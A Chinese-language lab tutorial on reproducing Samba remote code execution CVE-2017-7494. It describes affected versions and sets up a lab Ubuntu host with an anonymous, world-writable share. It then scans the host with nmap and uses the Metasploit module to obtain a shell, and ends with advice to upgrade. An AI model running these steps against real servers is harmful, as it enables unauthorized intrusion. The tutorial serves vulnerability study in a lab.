您好,登錄后才能下訂單哦!
如何進行Samba遠程代碼執行漏洞CVE-2017-7494的復現,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
Samba是在Linux和UNIX系統上實現SMB協議的一個免費軟件,由服務器及客戶端程序構成。SMB(Server Messages Block,信息服務塊)是一種在局域網上共享文件和打印機的一種通信協議,它為局域網內的不同計算機之間提供文件及打印機等資源的共享服務。SMB協議是客戶機/服務器型協議,客戶機通過該協議可以訪問服務器上的共享文件系統、打印機及其他資源。通過設置“NetBIOS over TCP/IP”使得Samba不但能與局域網絡主機分享資源,還能與全世界的電腦分享資源。
2017年5月24日Samba發布了4.6.4版本,中間修復了一個嚴重的遠程代碼執行漏洞,漏洞編號CVE-2017-7494,漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本,,確認屬于嚴重漏洞,可以造成遠程代碼執行。
Samba 3.5.0到4.6.4/4.5.10/4.4.14的中間版本。
應理解為:也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修復了這個漏洞
受害機:Ubuntu14.04 Samba版本:4.1.6 IP:192.168.3.12
攻擊機:kali IP:192.168.3.6
1.使用命令在ubuntu安裝samba
apt-get install samba
2.安裝完成后使用以下命令查看版本
/usr/sbin/samba -V
3.安裝完成后創建一個共享目錄,并且賦予寫權限,
mkdir /home/share
chmod 777 /home/share
4.然后修改配置文件/etc/samba/smb.conf,在配置文件最后添加如下內容:
[myshare]
comment=smb share test
browseable=yes #可讀
writeable=yes #可寫
path=/home/share #設置目錄(上一步創建的共享目錄)
public = yes #允許匿名登錄
5.配置完成后啟動服務
service smbd start //啟動
1.使用nmap掃描查看開啟的服務
nmap -p445 -sV 192.168.3.12
2.使用kali中的metasploit搜索漏洞該漏洞編號
search 2017-7494
3.然后選擇此exp并進行配置IP
use 0
4.配置完成后run或者使用exploit執行,即可看到拿下shell
1.建議升級至最新版本或使用4.6.4/4.5.10/4.4.14其中某個版本
看完上述內容,你們掌握如何進行Samba遠程代碼執行漏洞CVE-2017-7494的復現的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。